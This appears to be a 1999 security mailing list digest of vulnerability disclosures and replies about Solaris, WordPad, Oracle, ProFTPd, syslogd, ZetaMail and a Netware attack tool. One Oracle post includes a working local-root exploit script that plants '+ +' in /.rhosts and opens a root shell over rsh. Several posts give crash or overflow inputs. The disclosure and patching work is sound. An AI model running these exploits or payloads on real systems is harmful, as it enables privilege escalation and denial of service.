Re: rpc.ttdbserverd on solaris 7 In-reply-to: Your message of Tue, 16 Nov 1999 14:34:41 PST. 3831DC01.BFE5B400@nis.acs.uci.edu
After talking to Casper and Dan Stronberg it seem the issue he is seeing is Sun BugID 4204015 "dbserver SEGVs when rpc function 15 is called with garbage". This vulnerability in Solaris 7 seem to be triggered by the old rpc.ttdbserverd exploit. Please note that an attacker can't make rpc.ttdbserverd execute code. It can simply make it crash (dereferencing a NULL pointer). The problem is fixed by Patch-ID# 107893-02. So no, Solaris 7 is not vulnerable to the old rpc.ttdbserverd exploit in as much as it will only crash the service, not execute code in the target system. Also note that although the patch is not in the recommended patch list, it is in the security path list which in effect makes it public. -- Elias Levy Security Focus http://www.securityfocus.com/
Re: rpc.ttdbserverd on solaris 7
] We recently had mass attempts at breaking into our systems through ] rpc.ttdbserverd. ] Some of the rpc.ttdbserverd's dumped core, including at least one on ] solaris 7. ] Some of our systems with noexec_user_stack and noexec_user_stack_log ] reported attempts to execute code on the stack. Needless to say, this ] is worrisome. ] The messages logged look like: ] Nov 12 18:47:01 foo.bar.baz /usr/dt/bin/rpc.ttdbserverd[646]: ] _Tt_file_system::findBestMountPoint -- max_match_entry is null, ] aborting... ] Nov 12 18:47:01 foo.bar.baz inetd[143]: /usr/dt/bin/rpc.ttdbserverd: ] Segmentation Fault - core dumped ] Nov 12 18:47:02 foo.bar.baz unix: rpc.ttdbserverd[1932] attempt to ] execute code on stack by uid 0 ] Nov 12 18:47:02 foo.bar.baz inetd[143]: /usr/dt/bin/rpc.ttdbserverd: ] Segmentation Fault - core dumped ] Nov 12 18:47:03 foo.bar.baz unix: rpc.ttdbserverd[1934] attempt to ] execute code on stack by uid 0 ] Nov 12 18:47:03 foo.bar.baz inetd[143]: /usr/dt/bin/rpc.ttdbserverd: ] Segmentation Fault - core dumped ] We looked at the situation a bit more, and discovered that there is an ] rpc.ttdbserverd patch for Solaris 7 (107893-02), but it actually isn't ] on the recommended patch list for some reason. ] Does this patch fix the vulnerability I've described? Yes, the Solaris 7 patch 107893-02 does fix the core dump problem. The core dump is not caused by a stack overflow, but by a NULL pointer dereference. We do always recommend that users install the latest recommended and security patch sets for your version of Solaris. ] If yes, why would it not be recommended? It is on the current recommended patch list, I confirmed this at: ftp://sunsolve.Sun.COM/pub/patches/Solaris7.PatchReport Patch-ID# 107893-02 Synopsis: OpenWindows 3.6.1: Tooltalk patch BugId's fixed with this patch: 4229531 4153078 4204015 4260867 Changes incorporated in this version: 4204015 4260867 Date: Sep/27/99 ] If not, is a patch forthcoming? See above. Best regards, Brent Paulson [EMAIL PROTECTED]
Re: WordPad/riched20.dll buffer overflow
Pauli Ojanpera wrote: Just if someone needs to know... Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer overflow problem with ".rtf"-files. Crashme.rtf : {\rtf\} A malicious document may probably abuse this to execute arbitary code. WordPad crashes with EIP=41414141. Someone else do deeper investigation since I don't care to. I've been trying to determine if it's exploitable, and couldn't reproduce what you described. I want to know if there is some other information I need to know... here is what I tried: an rtf file with {\rtf\A...} a lot of As (tryed 32,49,1000,2000,... 5000... 2) nothing happened until 5000, where I got a crash but not with EIP== 0x41414141 but with ESI==0x41414141 on a 'push [esi]'. ESI was copyed previously from the stack, but on the stack there where only 4 As here, 8 As there, a so... then on 1 As I got a different crash, with EDI==0x41414141, but never got EIP==0x41414141. Anyway, it MAY be exploitable, but doesn't look simple... Then I tryed a differen aproach I got http://www.securityfocus.com, I used a real rtf file and appended the same amount (32,49,...) of As after the first '\', but got exactly the same results... could anybody reproduce this bug? richie -- A390 1BBA 2C58 D679 5A71 - 86F9 404F 4B53 3944 C2D0 Research and Developemen - CoreLabs - Core SDI (Information Security) http://www.core-sdi.com --- For a personal reply use [EMAIL PROTECTED]
Re: Tektronix PhaserLink Webserver Reveals Admin Password
Here are a couple more problems with the Tektronix webserver services: And one more: Even in absence of any sort of password- (or password hash-) aquiring attack, it's still possible to use up all of someone's consumables without a password at all -- No trickery required! [Keep in mind that a toner set for a 780 is ~ $600] The "configure settings" page (http://printer/button_config.html) has a drop-down menu that allows you to print a number of different pages (test pages, color samples, startup page). This menu, and the functions it performs, do not require a password of any sort. Go to the page, select "CMYK Sampler Prints", click the button, and sit back while 32 pages of toner and paper go away. [I reported this to Tektronix more than 6 months ago, at the same time I reported a printer-crashing bug. They fell all over themselves to fix the crashing bug (with some of the best support I'd ever gotten ... good job!), but seemed truly uninterested in stopping random people from being able to consume one's toner.] Me, I just firewall my damned printer. -WW
Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability
Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability PROBLEM UssrLabs found a Local/Remote DoS Attack in ZetaMail 2.1 Mail POP3/SMTP Server, the buffer overflow is caused by a long user name/password, 3500 characters. There is not much to expand on just a simple hole Example: [gimmemore@itsme]$ telnet example.com 110 Trying example.com... Connected to example.com. Escape character is '^]'. +OK ZetaMail for 95 BD0211 4294764405.063903189415041@itsme USER {buffer) +OK Send password PASS {buffer) Overflow Crashh. Where (buffer) is 3500 characters. Binary / Source for the D.o.s for Windows / Linux: http://www.ussrback.com/zmail/ Vendor Status: Contacted. Credit: USSRLABS SOLUTION install another program from the same vendor, MsgCore/95 2.11,MsgCore/NT 2.10 u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h http://www.ussrback.com
ProFTPd - mod_sqlpw.c
A member of the proftpd mailing list and myself discovered a problem with proftpd with mod_sqlpw.c optional module compiled in. Unix last command reveals passwords where the username should be. A patch was sent to the mailing list, however, the patch only protects ftp localhost not ftp remotehost. Johnie Ingram (Author of mod_sqlpw.c) was notified, as well as, the rest of the mailing list. I suggest the following work around: Global Wtemplog off /Global Wtmplog details below: WtmpLog Syntax: WtmpLog on|off|NONE Default: WtmpLog on Context: server config, VirtualHost, Anonymous, Global Compatibility: 1.1.7 and later The WtmpLog directive controls proftpd's logging of ftp connections to the host system's wtmp file (used by such commands as `last'). By default, all connections are logged via wtmp. _Todd
local users can panic linux kernel (was: SuSE syslogd advisory)
The impact of the syslogd Denial Of Service vulnerability seems to be bigger than expected. I found that syslog could not be stopped from responding by one or a few connections, since it uses select() calls to synchronously manage the connections to /dev/log. I made an attempt with the attached test code, which makes about 2000 connects to syslog, using multiple processes, and my system instantly died with the message: 'Kernel panic: can't push onto full stack' I've been able to reproduce this as non-root user, although it had to be done two times to overcome the stronger user resource limits, but it worked. This has been tested with linux 2.0.38+syslog1.3 (redhat 5.2). As a temporary fix, I'd strongly advise everyone who hasn't to set proper user resource limits, but that is only a very temporary fix. Taking a guess, I would say that the panic is caused by instability of the linux select() implementation, and could therefore be abused in other programs that manage an unlimited amount of connections using the select syscall. Mixter [EMAIL PROTECTED] members.tripod.com/mixtersecurity On Thu, 18 Nov 1999, Thomas Biege wrote: _ SuSE Security Announcement - syslogd (a1) Package: syslogd-1.3.33 (a1) Date: Thu Nov 18 14:00:29 CET 1999 Affected SuSE versions: 6.2 and 6.3 Vulnerability Type: local denial-of-service attack SuSE default package: yes Other affected systems: all Linux systems using the syslog daemon __ A security hole was discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s). Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue. Please note, that that we provide this information on an "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package. _ 1. Problem Description The syslogd server uses a Unix Domain stream socket (/dev/log) for receiving local log messages via syslog(3). Unix Domain stream sockets are non connection-less, that means, that one process is needed to serve one client. 2. Impact By opening alot of local syslog connections a user could stop the system from responding. 3. Solution Updated the package from our FTP server. __ Please verify these md5 checksums of the updates before installing: c9a9e0f8fc4e29daf30f8a735ae333ab syslogd-1.3.33-9.alpha.rpm (AXP, 6.1) 3104e26a8b474e215ed703b7c4d4 syslogd-1.3.33-9.i386.rpm (x86, 5.3) a13be12a75232f2f62f51fb1cae26fc0 syslogd-1.3.33-9.i386.rpm (x86, 6.1) fc29df9455288f40eb1e8dbd0f47d5b3 syslogd-1.3.33-9.i386.rpm (x86, 6.2) 869b7fedd5b52807f12b7f66e282002c syslogd-1.3.33-9.i386.rpm (x86, 6.3) __ You can find updates on our ftp-Server: ftp://ftp.suse.com/pub/suse/axp/update/6.1/a1/syslogd-1.3.33-9.alpha.rpm ftp://ftp.suse.com/pub/suse/i386/update/5.3/a1/syslogd-1.3.33-9.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.1/a1/syslogd-1.3.33-9.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.2/a1/syslogd-1.3.33-9.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.3/a1/syslogd-1.3.33-9.i386.rpm or try the following web pages for a list of mirrors: http://www.suse.de/de/support/download/ftp/inland.html http://www.suse.de/de/support/download/ftp/ausland.html Our webpage for patches: http://www.suse.de/de/support/download/updates/index.html Our webpage for security announcements: http://www.suse.de/de/support/security/index.html If you want to report vulnerabilities, please contact [EMAIL PROTECTED] __ SuSE has got two free security mailing list services to which any interested party may subscribe: [EMAIL PROTECTED] - moderated and for general/linux/SuSE security discussions. All SuSE security announcements are send to this list. [EMAIL PROTECTED] - SuSE's announce-only mailing list. Only SuSE's security annoucements are sent to this list. To subscribe to the list, send a message to: [EMAIL PROTECTED] To remove your address from the list, send a message to: [EMAIL
Notifying Vendors
With the bit of talk of notifying vendors in the past day or two, I thought I might throw in my $0.02 and how I do things. Notification and how long you wait for response should be dependant on usage of the software. For example, the WU-FTPD hole in 2.5.0. No exploit has been released to date, even though 2.6.0 is out. Its a widespread package that would affect a LOT of systems if the exploit was just tossed out without giving the vendors time to come up with at least a temporary fix better than "disable FTP". I believe that notification is _almost_ always necessary (except in rare cases like my Alibaba CGI bugs, because Alibaba had already demonstrated their lack of interest in security of their software). So basically what I'm trying to say is the time you wait for a response from the vendor (and/or a patch released) should depend on the severity of the hole and how widespread it will be. -Kerb-
Re: WordPad/riched20.dll buffer overflow
This bug is also present in Microsoft's flagship operating system Windows 2000 On Thu, 18 Nov 1999, Pauli Ojanpera wrote: Just if someone needs to know... Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer overflow problem with ".rtf"-files. Crashme.rtf : {\rtf\} A malicious document may probably abuse this to execute arbitary code. WordPad crashes with EIP=41414141. Someone else do deeper investigation since I don't care to. __ Get Your Private, Free Email at http://www.hotmail.com
Potential vulnerability in Oracle
Hi Brock Your note concerning a possible security vulnerability in Oracle (text below) was forwarded to me. This vulnerability has indeed been diagnosed and fixed already. Here is the scoop on where you can obtain fixes: SUPPORTED CUSTOMERS: The alert and 5 patches are posted on metalink: - URL: http://metalink.oracle.com/ UNSUPPORTED CUSTOMERS: The alert and 5 patches are posted on OTN: - URL: http://technet.oracle.com/ This was also issued as an ISS alert. Regarding your comment about reporting these issues to Oracle, we do have an internal process in place for expediting the way we handle potential security vulnerabilities, but we believe it's best to have all potential bugs come through Oracle World Wide Support first, after which they are diagnosed, and expedited as required. Thank you for your interest in Oracle and security. Yours very truly, Mary Ann Davidson ~~ Mary Ann Davidson Group Product Manager, Security Server Technologies Oracle Corporation (650) 506 5464 ~~ No ka moana ku'u mele; no na halu au e hula ai. "From the ocean comes my song; of the waves I dance my dance." ~~ OVERVIEW A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user to obtain root privileges. BACKGROUND My testing was done with Oracle 8.1.5 on Solaris 2.6 SPARC edition. This shouldn't make any difference, however, and I would consider any UNIX Oracle implementation to be exploitable. DETAILS When run without ORACLE_HOME being set, dbsnmp (suid root/sgid dba by default) will dump two log files out into pwd, dbsnmpc and dbsnmpt . If these files do not exist, dbsnmpd will attempt to create them mode 666 and dump around 400 bytes of uncontrolable output into them. If the files do exist, dbsnmp will append these 400 bytes but not change the permissions. Thus if root does not have an .rhosts file, we can obtain root privs by creating a symlink from /tmp/dbsnmpc to /.rhosts. One thing to note about the exploit is that on my particular implementation, a normal user does not have read access above /product/ in the Oracle path (something like /u01/app/oracle/product/8.1.5/bin/dbsnmp). This won't prevent you from running the exploit since the execute bit is set for world on all of Oracle's directories, but you may have to guess about the location of dbsnmp. This can usually done by examining the process list for Oracle entries. EDITORIAL One small rant about Oracle is their ridiculously complicated bug reporting scheme, which asks you 2814 questions and allows you ONE line of text to explain your problem. In this day and age, I don't understand why every major software vendor doesn't have something as simple as a mailto [EMAIL PROTECTED] SOMEWHERE on their site. In fact, when I searched Oracle's web page, I got zero hits on the word "security". Perhaps this address does exist and a bugtraq reader would care to enlighten me. EXPLOIT oracle8% uname -a; id SunOS oracle8 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10 uid=102(btellier) gid=10(staff) oracle8% /tmp/oracle.sh couldn't read file "/config/nmiconf.tcl": no such file or directory Failed to initialize nl component,error=462 Failed to initialize nl component,error=462 # --- oracle.sh --- #!/bin/sh # Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others # You'll probably have to change your path to dbsnmp # Exploit will only work if /.rhosts does NOT exist # # Brock Tellier [EMAIL PROTECTED] cd /tmp unset ORACLE_HOME umask ln -s /.rhosts /tmp/dbsnmpc.log /u01/app/oracle/product/8.1.5/bin/dbsnmp echo "+ +" /.rhosts rsh -l root localhost 'sh -i' rsh -l root localhost rm /tmp/*log* rsh -l root localhost rm /.rhosts
Pandora v4 Beta 2 Software
___ Nomad Mobile Research Centre A N N O U N C E M E N T www.nmrc.org Simple Nomad [[EMAIL PROTECTED]] 19Nov1999 ___ Product : Pandora v4.0 Beta 2 Platform : Windows 95/98/NT X on Linux Jitsu-Disk has been very, very busy. Pandora v4.0 beta software has been updated. The new Pandora v4.0 *Beta 2* software is now available. It still has the "point, click, and attack" GUI interface, it still runs under Windows 95/98/NT or Linux with X, it still is the full metal jacket ninja kungfu action software for hacking Netware you've grown to love. Still compiled with 100% freeware compilers using freeware libraries with no big corporation SDK assistance, still the same GUI in Windows or Linux. The GUI interface contains these features: * Offline and Online components. Offline for cracking passwords offline, and Online for direct server attacks. * Improved MGUI interface. Offline includes: * Password cracking of Netware 4.x and 5.x passwords. * Reads native NDS files -- as well as maintenance files such as BACKUP.DS, BACKUP.NDS, and DSREPAIR.DIB -- and extracts password hashes for cracking. * Reads Netware 4.x and 5.x versions of NDS, BACKUP.DS, and DSREPAIR.DIB. * Multiple accounts can be brute forced and dictionary cracked simultaneously. * Preset and user-definable keyspace for brute forcing. * On screen sorting of account listings for easy viewing. * Built-in NDS browser to look at all NDS objects. * Remote Console Decryption using The Ruiner's decryption algorithm. * Fully optimized for Pentium processors for maximum carnage. * Bug fixes from Beta 1. Online includes: * Attach to servers using only the password hash (if you do not wish to crack them). * Dictionary attacks against NDS objects that detect if Intruder Detection was triggered. * Browse for target servers and gather connection info for spoofing attacks. * GameOver spoofing attack against servers not using Level 3 packet signature. * Improved Level3-1 attack which no longer requires using a sniffer to find elusive data for Admin session hijacking, just add in the Admin's MAC address and we do the rest. * "Sniff-n-Grab" files being downloaded from the Netware server by unsuspecting users. * Several nasty Denial of Service attacks. * Improved packet drivers from Beta 1. * Numerous bug fixes. * Actual working code to attack from Linux. Requires an IPX-aware kernel and root access. Full source code included in case you don't trust our binaries, and for adding your own code. Windows software is available now and appears to be stable. Linux software is posted and works, but may be updated somewhat frequently over the next few days. The Online code for Linux is working but YMMV. Check out binaries, code, doco, rants, and more at http://www.nmrc.org/pandora/ ___
Re: WordPad/riched20.dll buffer overflow
Just if someone needs to know... Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer overflow problem with ".rtf"-files. Crashme.rtf : {\rtf\} A malicious document may probably abuse this to execute arbitary code. WordPad crashes with EIP=41414141. I got my WordPad crashed with message: The instruction at "0x61616161" referenced memory at "0x61616161". The memory could not be "read". I press "OK" to close application, next message is: The instruction at "0x5f8012b3" referenced memory at "0x0004". The memory could not be "read". Then I have only "choice" to "terminate the application". I use Windows NT (international English edtion) + SP5 . Bronek Kozicki